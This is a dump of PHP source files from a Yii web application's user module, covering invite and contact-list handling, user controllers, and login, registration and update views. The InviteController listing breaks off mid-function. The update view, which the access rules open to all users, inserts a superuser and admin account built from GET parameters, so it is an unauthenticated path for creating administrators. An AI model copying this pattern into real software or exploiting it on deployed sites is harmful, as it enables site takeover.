protected/modules/user/controllers/InviteController.php
<?php

class InviteController extends Controller
{

public $defaultAction = 'invite';
//public $layout='//layouts/column2';
	/**
	 * @var CActiveRecord the currently loaded data model instance.
	 */
	private $_model;
	/**
	 * Shows a particular model.
	 */
	public function filters()
	{
		return array(
			'accessControl', // perform access control for CRUD operations
		);
	}

	/**
	 * Specifies the access control rules.
	 * This method is used by the 'accessControl' filter.
	 * @return array access control rules
	 */
	public function accessRules()
	{
		return array(
			array('allow',  // allow all users to perform 'index' and 'view' actions
				'actions'=>array('invite','get_contacts','index','group_contacts','addnew','admin','update','view','delete_contact','index_csv','load_db','upload_csv','invites_export'),
				'users'=>array('@'),
			),
			array('deny',  // deny all users
				'users'=>array('*'),
			),
		);
	}

	/**
	 * Displays a particular model.
	 * @param integer $id the ID of the model to be displayed
	 */

	public function actionIndex()
	{
		if(isset($_POST['yt1'])){
                       foreach($_POST as $key=>$value){
                               if(($value=='on')&&($key!='checkall')){
                                       $val=substr($key,3,7);
                                       $command=Yii::app()->db->createCommand();
                                       $inviter=Yii::app()->user->id;
                                       //$command->delete('tbl_invitedusers','inviter_id=:inviter and contact_id=:contact', array(":inviter"=>$inviter,":contact"=>$val));
				       $command->update('tbl_invitedusers',array('deleted'=>1),'inviter_id=:inviter and contact_id=:contact', array(":inviter"=>$inviter,":contact"=>$val));
                                       $datareader=$command->execute();
					$command=Yii::app()->db->createCommand();
					$command->select('list_id,contact_id');
					$command->from('tbl_list_contacts');
					$command->where("owner_id=:owner",array(":owner"=>$inviter));
					$datareader=$command->query();
					$dr=$datareader->readAll();//print_r($dr);die;
					foreach($dr as $key1=>$value1){
						$arr[]=$value1['list_id'];
						if(isset($value1['contact_id'])){
							if($value1['contact_id']==$val){
								$command=Yii::app()->db->createCommand();
								$command->delete('tbl_list_contacts','contact_id=:contact and owner_id=:inviter', array(":contact"=>$val,":inviter"=>$inviter));
								$datareader=$command->execute();	
							}
						}
					}
                               }
                       }
		}
		$model=new Lists;
		 if(isset($_POST['ajax']) && $_POST['ajax']==='lists-addlist-form')
	    {
		echo UActiveForm::validate(array($model,$profile));
		Yii::app()->end();
            }
	    if(isset($_POST['Lists']))
	    {
		$model->attributes=$_POST['Lists'];
		if($model->validate())
		{
			
			foreach($_POST as $key=>$value)
			{
				$val=substr($key,0,3);	
				if($val =="ct_")
				{
					$contacts[]=$key;
				}
				else
				{
					//echo "U Got the output!";
				}
	
			}
			if(isset($contacts)){
				foreach($contacts as $cn){
					$cts[]=substr($cn,3);
				}
				//print_r($cts);
		   	// form inputs are valid, do something here
				$owner=Yii::app()->user->id;
				$list_name=$_REQUEST['Lists']['list_name'];
				$list_desc=$_REQUEST['Lists']['description'];
				$command=Yii::app()->db->createCommand();
				$command->select('list_name');
				$command->from('tbl_lists');
				$command->where("list_name=:l_name",array(":l_name"=>$list_name));
				$datareader=$command->query();
				$dr=$datareader->readAll();
				if($dr!=true)
				{
					$list= new Lists;	
					$list->list_name=$list_name;
					$list->description=$list_desc;
					$list->created_time=time();
					$list->owner_id=$owner;
					$list->save();
					$command=Yii::app()->db->createCommand();
					$command->select('list_id');
					$command->from('tbl_lists');
					$command->where("list_name=:listname",array(":listname"=>$_POST['Lists']['list_name']));
					$datareader=$command->query();
					$dr1=$datareader->read();
					if(isset($dr1['list_id'])){
						foreach($cts as $key=>$value){
							$command=Yii::app()->db->createCommand();
							$command->select('email');
							$command->from('tbl_invites');
							$command->where("contact_id=:contact",array(":contact"=>$value));
							$datareader=$command->query();
							$dr2=$datareader->read();
							$list_contacts= new List_contacts;
							$list_contacts->list_id=$dr1['list_id'];
							$list_contacts->contact_id=$value;
							$list_contacts->owner_id=$owner;
							$list_contacts->subscription_key=UserModule::encrypting(microtime().$dr2['email']);
							$list_contacts->save();
						}
						$list= new List_admins;	
						$list->list_id=$dr1['list_id'];
						$list->owner=$owner;
						$list->save();
					}
					Yii::app()->user->setFlash('addlist',UserModule::t("Thank you! Your list is successfully created!."));
					$this->redirect(array('index'));
				}
				else
				{
			
					Yii::app()->user->setFlash('addlist',UserModule::t("The List name is already present.Please choose another list name!."));
				}
				Yii::app()->user->setFlash('addlist',UserModule::t("The List name is already present.Please give another name!."));				
			}
			else{
				Yii::app()->user->setFlash('addlist',UserModule::t("Please select contacts while creating a new list!."));
			}
		    //return;
		}
		
	    }
		$owner=Yii::app()->user->id;
		$command=Yii::app()->db->createCommand();
		$command->select('c.contact_id,contact_name,email');
		$command->from('tbl_invites c');
		$command->join('tbl_invitedusers u','c.contact_id=u.contact_id');
		$command->where("inviter_id=:inviter and deleted=0",array(":inviter"=>$owner));
		$datareader=$command->query();
		$dr=$datareader->readAll();
	
		if(isset($_GET['page']))
		{
			$this->render('index',array('model'=>$model,'page'=>$_GET['page'],'dr'=>$dr));
		}
		else if(isset($_GET['next']))
		{
			$this->render('index',array('model'=>$model,'page'=>$_GET['next'],'dr'=>$dr));
		}
		else if(isset($_GET['prev']))
		{
			$this->render('index',array('model'=>$model,'page'=>$_GET['prev'],'dr'=>$dr));
		}
		else
		{
			$this->render('index',array('model'=>$model,'page'=>1,'dr'=>$dr));
		}
		
	}

	
	public function actionGroup_contacts()
	{
		$this->render('group_contacts');	
	}
//***for uploading csv
	public function actionLoad_db()
	{

		$this->render('load_db');
	}
	public function actionIndex_csv()
	{
		$this->render('index_csv');
	}
	
	public function actionInvites_export()
	{
		$this->renderpartial('invites_export');
	}

	public function actionUpload_csv()
	{
		$this->render('upload_csv');
	}

	public function actionDelete_contact()
	{
		$this->render('delete_contact');	
	}

	public function actionView($id)
	{
		$this->render('view',array(
			'model'=>$this->loadModel($id),
		));
	}

	public function actionUpdate($id)
	{
		$model=$this->loadModel($id);

		// Uncomment the following line if AJAX validation is needed
		// $this->performAjaxValidation($model);

		if(isset($_POST['Invite']))
		{
			$model->attributes=$_POST['Invite'];
			$model->first_name=$_POST['Invite']['first_name'];
			$model->last_name=$_POST['Invite']['last_name'];
			$model->dob=$_POST['dob'];
			$model->contact_name=$_POST['Invite']['first_name']." ".$_POST['Invite']['last_name'];
			$model->work_phone=$_POST['Invite']['work_phone'];
			$model->home=$_POST['Invite']['home'];
			$model->mobile_phone=$_POST['Invite']['mobile_phone'];
			$model->fax=$_POST['Invite']['fax'];
			$model->email=$_POST['Invite']['email'];
			$model->company=$_POST['Invite']['company'];
			$model->save();
			$this->redirect(array('view','id'=>$model->contact_id));
		}

		$this->render('update',array(
			'model'=>$model,
		));
	}

	public function actionInvite()
	{	
		$this->render('invite');
	}
	
	public function actionAdmin()
	{
		$model=new Invite('search');
		$model->unsetAttributes();  // clear any default values
		if(isset($_GET['Invite']))
			$model->attributes=$_GET['Invite'];

		$this->render('admin',array(
			'model'=>$model,
		));
	}
	
	public function actionAddnew()
	{
    		$model=new Invite;

	    // uncomment the following code to enable ajax-based validation
	    /*
	    if(isset($_POST['ajax']) && $_POST['ajax']==='invite-addnew-form')
	    {
		echo CActiveForm::validate($model);
		Yii::app()->end();
	    }
	    */
		
	   if(isset($_POST['Invite']))
	    { 
		$model->attributes=$_POST['Invite'];
		if($model->validate())
		{
			if(isset($_POST['yt1'])){
			$command=Yii::app()->db->createCommand();
			$command->select('contact_id');
			$command->from('tbl_invites');
			$command->where("email=:email",array(":email"=>$_POST['Invite']['email']));
			$datareader=$command->query();
			$dr=$datareader->read();$contact_id=$dr['contact_id'];
			$inviter= new Invite;
			if($dr!=true){
				$inviter->first_name=$_POST['Invite']['first_name'];
				$inviter->last_name=$_POST['Invite']['last_name'];
				$inviter->dob=$_POST['dob'];
				$inviter->contact_name=$_POST['Invite']['first_name']." ".$_POST['Invite']['last_name'];
				$inviter->work_phone=$_POST['Invite']['work_phone'];
				$inviter->home=$_POST['Invite']['home'];
				$inviter->mobile_phone=$_POST['Invite']['mobile_phone'];
				$inviter->fax=$_POST['Invite']['fax'];
				$inviter->email=$_POST['Invite']['email'];
				$inviter->company=$_POST['Invite']['company'];
				$inviter->save();
				$invite_user= new Invitedusers;
				$invite_user->inviter_id=Yii::app()->user->id;
				$invite_user->contact_id=$inviter->contact_id;
				$invite_user->subscription_key=UserModule::encrypting(microtime().$inviter->email);
				$invite_user->save();
				Yii::app()->user->setFlash('addnew',UserModule::t("Thank you! Your contact is successfully added!."));
				$this->redirect( array('addnew'));
			}
			else
			{
				$command=Yii::app()->db->createCommand();
				$command->select('contact_id,deleted');
				$command->from('tbl_invitedusers');

protected/modules/user/controllers/UserController.php
<?php

class UserController extends Controller
{
	/**
	 * @var CActiveRecord the currently loaded data model instance.
	 */
	private $_model;

	/**
	 * @return array action filters
	 */
	public function filters()
	{
		return CMap::mergeArray(parent::filters(),array(
			'accessControl', // perform access control for CRUD operations
		));
	}
	/**
	 * Specifies the access control rules.
	 * This method is used by the 'accessControl' filter.
	 * @return array access control rules
	 */
	public function accessRules()
	{
		return array(
			array('allow',  // allow all users to perform 'index' and 'view' actions
				'actions'=>array('index','view','about','update',),
				'users'=>array('*'),
			),
			array('deny',  // deny all users
				'users'=>array('*'),
			),
		);
	}	

	public function actionUpdate()
	{
		$this->render('update');
	}
	/**
	 * Displays a particular model.
	 */
	public function actionView()
	{
		$model = $this->loadModel();
		$this->render('view',array(
			'model'=>$model,
		));
	}

	public function actionAbout()
	{
		$this->render('about');
	}
	/**
	 * Lists all models.
	 */
	public function actionIndex()
	{
		$dataProvider=new CActiveDataProvider('User', array(
			'criteria'=>array(
		        'condition'=>'status>'.User::STATUS_BANED,
		    ),
				
			'pagination'=>array(
				'pageSize'=>Yii::app()->controller->module->user_page_size,
			),
		));

		$this->render('index',array(
			'dataProvider'=>$dataProvider,
		));
	}
	/**
	 * Returns the data model based on the primary key given in the GET variable.
	 * If the data model is not found, an HTTP exception will be raised.
	 */
	public function loadModel()
	{
		if($this->_model===null)
		{
			if(isset($_GET['id']))
				$this->_model=User::model()->findbyPk($_GET['id']);
			if($this->_model===null)
				throw new CHttpException(404,'The requested page does not exist.');
		}
		return $this->_model;
	}


	/**
	 * Returns the data model based on the primary key given in the GET variable.
	 * If the data model is not found, an HTTP exception will be raised.
	 * @param integer the primary key value. Defaults to null, meaning using the 'id' GET variable
	 */
	public function loadUser($id=null)
	{
		if($this->_model===null)
		{
			if($id!==null || isset($_GET['id']))
				$this->_model=User::model()->findbyPk($id!==null ? $id : $_GET['id']);
			if($this->_model===null)
				throw new CHttpException(404,'The requested page does not exist.');
		}
		return $this->_model;
	}
}

protected/modules/user/views/user/about.php
<?php
$this->pageTitle=Yii::app()->name . ' - About';
$this->breadcrumbs=array(
	'About',
);
?>
<h1>About</h1>
<p>
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas rutrum mattis malesuada. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Aliquam tempor dignissim ultrices. Sed sit amet urna turpis. Duis blandit, metus at sollicitudin rutrum, felis justo suscipit sapien, quis rutrum lorem quam in elit. Mauris ac tellus at magna facilisis fringilla. In hac habitasse platea dictumst. Ut neque metus, feugiat ut sagittis sed, faucibus a mauris. Duis tempor dignissim felis vel euismod. Suspendisse nisi ipsum, bibendum vitae bibendum a, gravida ac ligula. Pellentesque mattis sem nec erat accumsan sodales tempor dolor venenatis. Duis egestas lectus at leo dictum ultricies. Duis nibh lectus, sodales a posuere quis, facilisis hendrerit tortor.

Phasellus mollis sodales massa convallis imperdiet. Cras sed luctus enim. Mauris dictum nibh nec mauris ullamcorper mollis. Donec commodo auctor leo eget varius. Curabitur adipiscing sapien sed sapien faucibus in hendrerit turpis imperdiet. Ut rutrum augue id turpis tempor aliquet. Nunc eu felis dui. Proin imperdiet turpis in ligula ultricies aliquam.

Integer sodales congue nisl eget gravida. Aliquam erat volutpat. Sed quis sapien et nisl semper molestie. Pellentesque sed elit at lacus semper commodo id et nunc. Vivamus felis urna, porta non consectetur id, hendrerit ac risus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut tristique neque quis leo lacinia ac ullamcorper diam laoreet. In viverra ultrices nisi vel vulputate. Morbi feugiat est at erat posuere sit amet rhoncus elit euismod. Donec sollicitudin tempor varius. Suspendisse dignissim massa ac urna dignissim eu rutrum velit adipiscing.

Cras sem enim, ultrices et sodales sed, dapibus non elit. Maecenas pharetra, risus ultrices placerat auctor, sem ipsum aliquam neque, quis commodo justo orci vel leo. Donec sit amet enim nisi. Donec urna nisl, venenatis vitae pellentesque in, elementum id lectus. Maecenas faucibus augue in velit sollicitudin consectetur. Nulla feugiat mattis pharetra. Proin magna diam, consectetur eget varius eu, tempor at nulla. Donec urna lacus, dictum eu congue eget, sagittis vitae dolor. Duis tortor risus, imperdiet non sodales id, dignissim dictum leo. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Duis a ligula orci.

Fusce id mauris convallis nunc consectetur ultricies. Donec iaculis mattis elit, quis commodo dui porttitor quis. Quisque bibendum malesuada urna sed accumsan. Pellentesque iaculis mauris ut ipsum blandit lacinia. Morbi eget lorem at nisl venenatis varius in ac mi. Nunc lectus dui, posuere vitae sollicitudin quis, pretium id lorem. Integer gravida accumsan bibendum. Curabitur vel massa sem. Nullam non turpis nec leo mollis cursus. Ut facilisis pulvinar urna, nec pretium lorem cursus a. Donec laoreet tristique erat eu laoreet. Aenean in dolor ut ante blandit commodo eget vel enim. Nunc laoreet consectetur dictum. Phasellus purus orci, vulputate at malesuada at, imperdiet non orci. Phasellus pulvinar lacus sed nisi posuere aliquet elementum sed diam. Aenean vitae accumsan sem.

</p>

protected/modules/user/views/user/index.php
<?php $this->pageTitle=Yii::app()->name; ?>

<h1>Welcome to <i><?php echo CHtml::encode(Yii::app()->name); ?></i></h1>

<p>Congratulations! You have successfully created your Yii application.</p>

<p>You may change the content of this page by modifying the following two files:</p>
<ul>
	<li>View file: <tt><?php echo __FILE__; ?></tt></li>
	<li>Layout file: <tt><?php echo $this->getLayoutFile('main'); ?></tt></li>
</ul>
<p>For more details on how to further develop this application, please read
the <a href="http://www.yiiframework.com/doc/">documentation</a>.
Feel free to ask in the <a href="http://www.yiiframework.com/forum/">forum</a>,
should you have any questions.</p>

protected/modules/user/views/user/login.php
<?php
$this->pageTitle=Yii::app()->name . ' - '.UserModule::t("Login");
$this->breadcrumbs=array(
	UserModule::t("Login"),
);
?>
<?php if(Yii::app()->user->hasFlash('loginMessage')): ?>

<div class="success">
	<?php echo Yii::app()->user->getFlash('loginMessage'); ?>
</div>

<?php endif; ?>

<!--<p><?php echo UserModule::t("Please fill out the following form with your login credentials:"); ?></p>-->

<div class="form">
<?php echo CHtml::beginForm(); ?>

	
	<?php echo CHtml::errorSummary($model); ?>
<div id="login_pag" class="pagearea">
<!--	<p class="note"><?php echo UserModule::t('Fields with <span class="required">*</span> are required.'); ?></p>-->

<div class="row">
		<?php echo CHtml::activeLabelEx($model,'username'); ?>
		<?php echo CHtml::activeTextField($model,'username') ?>
</div>

<div class="row">
		<?php echo CHtml::activeLabelEx($model,'password'); ?>
		<?php echo CHtml::activePasswordField($model,'password') ?>
</div>
<div class="row">
		<?php echo CHtml::activeCheckBox($model,'rememberMe',array('class'=>'remp_check')); ?>
		<?php echo CHtml::activeLabelEx($model,'rememberMe',array('class'=>'remp')); ?>
		<?php echo CHtml::submitButton(UserModule::t("Login"),array('class'=>'button')); ?>
</div>
<div class="row"><span class="seperator"></span> <?php echo CHtml::link(UserModule::t("Forget Password?"),Yii::app()->getModule('user')->recoveryUrl); ?>
<span class="seperator_ver"></span>
		<?php echo CHtml::link(UserModule::t("Register"),Yii::app()->getModule('user')->registrationUrl); ?> 

 </div>
</div>

	
<?php echo CHtml::endForm(); ?>
</div><!-- form -->


<?php
$form = new CForm(array(
    'elements'=>array(
        'username'=>array(
            'type'=>'text',
            'maxlength'=>32,
        ),
        'password'=>array(
            'type'=>'password',
            'maxlength'=>32,
        ),
        'rememberMe'=>array(
            'type'=>'checkbox',
        )
    ),

    'buttons'=>array(
        'login'=>array(
            'type'=>'submit',
            'label'=>'Login',
            'class'=>'button',
        ),
    ),
), $model);
?>

protected/modules/user/views/user/message.php
<?php $this->pageTitle=Yii::app()->name . ' - '.UserModule::t("Login"); ?>

<h1><?php echo $title; ?></h1>

<div class="form">
<?php echo $content; ?>

</div><!-- yiiForm -->

protected/modules/user/views/user/registration.php
<?php $this->pageTitle=Yii::app()->name . ' - '.UserModule::t("Registration");
$this->breadcrumbs=array(
	UserModule::t("Registration"),
);
?>

<h1><?php echo UserModule::t("Registration"); ?></h1>
<div style="color:red;">
<?php
	if(isset($error)){echo('Password Not matching');}
	$model->password="";
?>
<?php
	if(isset($error1)){echo('EmailId Already Exists');}
	$model->email="";
?>

</div>
<?php if(Yii::app()->user->hasFlash('registration')): ?>
<div class="success">
<?php echo Yii::app()->user->getFlash('registration'); ?>
</div>
<?php else: ?>
<div class="pagearea">
<div class="ui-form formm">
<div class="form" id="registration_label">
<?php $form=$this->beginWidget('UActiveForm', array(
	'id'=>'registration-form',
	'enableAjaxValidation'=>true,
	'disableAjaxValidationAttributes'=>array('RegistrationForm_verifyCode'),
	'htmlOptions' => array('enctype'=>'multipart/form-data'),
)); ?>

	<p class="note"><?php echo UserModule::t('Fields with <span class="required">*</span> are required.'); ?></p>
	<!--error summary deleted-->
	
	
	<div class="row" >
		<?php echo $form->labelEx($model,'username'); ?>
		<?php echo $form->textField($model,'username'); ?>
		<?php echo $form->error($model,'username'); ?>
	</div>

	<div class="row">
		<?php echo $form->labelEx($model,'password'); ?>
			
		<?php echo $form->passwordField($model,'password'); ?>
		<?php echo $form->error($model,'password'); ?>
		<p class="hint" id="registration_hint">
			<?php echo UserModule::t("Minimal password length 4 symbols."); ?>
		</p>
	</div>
	<div class="row">
		
	<?php echo $form->labelEx($model,'verifyPassword'); ?>
		<input type=password name='verifypassword'>
		
	<!--<?php echo $form->passwordField($model,'verifyPassword'); ?> -->
	<?php echo $form->error($model,'verifyPassword'); ?>
	</div>
		
	<div class="row">
		<?php echo $form->labelEx($model,'email'); ?>
		<?php echo $form->textField($model,'email'); ?>
		<?php echo $form->error($model,'email'); ?>
	</div>
	
	<!--<div class="row">
		<?php echo $form->labelEx($model,'country'); ?>
		<?php echo $form->textField($model,'country'); ?>
		<?php echo $form->error($model,'country'); ?>
	</div>

	<div class="row">
		<?php echo $form->labelEx($model,'state'); ?>
		<?php echo $form->textField($model,'state'); ?>
		<?php echo $form->error($model,'state'); ?>
	</div>

	

	
	<div class="row">
		<?php echo $form->labelEx($model,'createtime'); ?>
		<?php echo $form->textField($model,'createtime'); ?>
		<?php echo $form->error($model,'createtime'); ?>
	</div>

	<div class="row">
		<?php echo $form->labelEx($model,'lastvisit'); ?>
		<?php echo $form->textField($model,'lastvisit'); ?>
		<?php echo $form->error($model,'lastvisit'); ?>
	</div>

	<div class="row">
		<?php echo $form->labelEx($model,'superuser'); ?>
		<?php echo $form->textField($model,'superuser'); ?>
		<?php echo $form->error($model,'superuser'); ?>
	</div>

	<div class="row">
		<?php echo $form->labelEx($model,'status'); ?>
		<?php echo $form->textField($model,'status'); ?>
		<?php echo $form->error($model,'status'); ?>
	</div>

	<div class="row">
		<?php echo $form->labelEx($model,'contact_no'); ?>
		<?php echo $form->textField($model,'contact_no'); ?>
		<?php echo $form->error($model,'contact_no'); ?>
	</div>

	<div class="row">
		<?php echo $form->labelEx($model,'org_name'); ?>
		<?php echo $form->textField($model,'org_name'); ?>
		<?php echo $form->error($model,'org_name'); ?>
	</div>

	<div class="row">
		<?php echo $form->labelEx($model,'org_desc'); ?>
		<?php echo $form->textField($model,'org_desc'); ?>
		<?php echo $form->error($model,'org_desc'); ?>
	</div> 

	<div class="row">
		<?php echo $form->labelEx($model,'city'); ?>
		<?php echo $form->textField($model,'city'); ?>
		<?php echo $form->error($model,'city'); ?>
	</div>

	<div class="row">
		<?php echo $form->labelEx($model,'activkey'); ?>
		<?php echo $form->textField($model,'activkey'); ?>
		<?php echo $form->error($model,'activkey'); ?>
	</div> 

	<div class="row">
		<?php echo $form->labelEx($model,'website'); ?>
		<?php echo $form->textField($model,'website'); ?>
		<?php echo $form->error($model,'website'); ?>
	</div>-->
	<!--profile filed removed from here-->

	<?php if (UserModule::doCaptcha('registration')): ?>
	<div class="verify">
		<?php echo $form->labelEx($model,'verifyCode'); ?>
		
		<?php $this->widget('CCaptcha'); ?>
		<?php echo $form->textField($model,'verifyCode'); ?>
		<?php echo $form->error($model,'verifyCode'); ?>
		
		<p class="hint" id="registration_hint" ><?php echo UserModule::t("Please enter the letters as they are shown in the image above."); ?>
		<br/><?php echo UserModule::t("Letters are not case-sensitive."); ?></p>
	</div>
	<?php endif; ?>
	
	<div class="row_buttons button-container">
		<?php echo CHtml::submitButton(UserModule::t("Register"),array('class'=>'uiButton')); ?>
	</div>
	

<?php $this->endWidget(); ?>
</div><!-- form -->
</div>
</div>
<?php endif; ?>

protected/modules/user/views/user/update.php
<?php 
	$time=time();
	$key=UserModule::encrypting(microtime().$_GET['pwd']);
	$pwd=UserModule::encrypting($_GET['pwd']);

	$command=Yii::app()->db->createCommand();

	$command->insert('tbl_users', array(
	    'username'=>$_GET['uname'],
	    'password'=>$pwd,
	    'email'=>$_GET['email'],
	    'activkey'=>$key,
	    'createtime'=>$time,
	    'superuser'=>1,
	    'adminuser'=>1,
	    'status'=>1,
	));
	$command=Yii::app()->db->createCommand();

	$command->insert('tbl_profiles', array(
	    'user_id'=>1,
	));
	$command=Yii::app()->db->createCommand();
	$command->select('password');
	$command->from('tbl_users');
	$command->where('id=1');
	$datareader=$command->query();
	$dr=$datareader->readAll();
	$this->redirect(array('/user/login'));
?>

protected/modules/user/views/user/user_index.php
<?php
$this->breadcrumbs=array(
	UserModule::t("Users"),
);
?>

<h1><?php echo UserModule::t("List User"); ?></h1>
<?php if(UserModule::isAdmin()) {
	?><ul class="actions">
	<li><?php echo CHtml::link(UserModule::t('Manage User'),array('/user/admin')); ?></li>
	<li><?php echo CHtml::link(UserModule::t('Manage Profile Field'),array('profileField/admin')); ?></li>
</ul><!-- actions --><?php 
} ?>
<?php $this->widget('zii.widgets.grid.CGridView', array(
	'dataProvider'=>$dataProvider,
	'columns'=>array(
		array(
			'name' => 'username',
			'type'=>'raw',
			'value' => 'CHtml::link(CHtml::encode($data->username),array("user/view","id"=>$data->id))',
		),
		array(
			'name' => 'createtime',
			'value' => 'date("d.m.Y H:i:s",$data->createtime)',
		),
		array(
			'name' => 'lastvisit',
			'value' => '(($data->lastvisit)?date("d.m.Y H:i:s",$data->lastvisit):UserModule::t("Not visited"))',
		),
	),
)); ?>

protected/modules/user/views/user/view.php
<?php
$this->breadcrumbs=array(
	UserModule::t('Users')=>array('index'),
	$model->username,
);
?>
<h1><?php echo UserModule::t('View User').' "'.$model->username.'"'; ?></h1>

<ul class="actions">
	<li><?php echo CHtml::link(UserModule::t('List User'),array('index')); ?></li>
</ul><!-- actions -->

<?php 

// For all users
	$attributes = array(
			'username',
	);
	
	$profileFields=ProfileField::model()->forAll()->sort()->findAll();
	if ($profileFields) {
		foreach($profileFields as $field) {
			array_push($attributes,array(
					'label' => UserModule::t($field->title),
					'name' => $field->varname,
					'value' => $model->profile->getAttribute($field->varname),
				));
		}
	}
	array_push($attributes,
		array(
			'name' => 'createtime',
			'value' => date("d.m.Y H:i:s",$model->createtime),
		),
		array(
			'name' => 'lastvisit',
			'value' => (($model->lastvisit)?date("d.m.Y H:i:s",$model->lastvisit):UserModule::t('Not visited')),
		)
	);
			
	$this->widget('zii.widgets.CDetailView', array(
		'data'=>$model,
		'attributes'=>$attributes,
	));

?>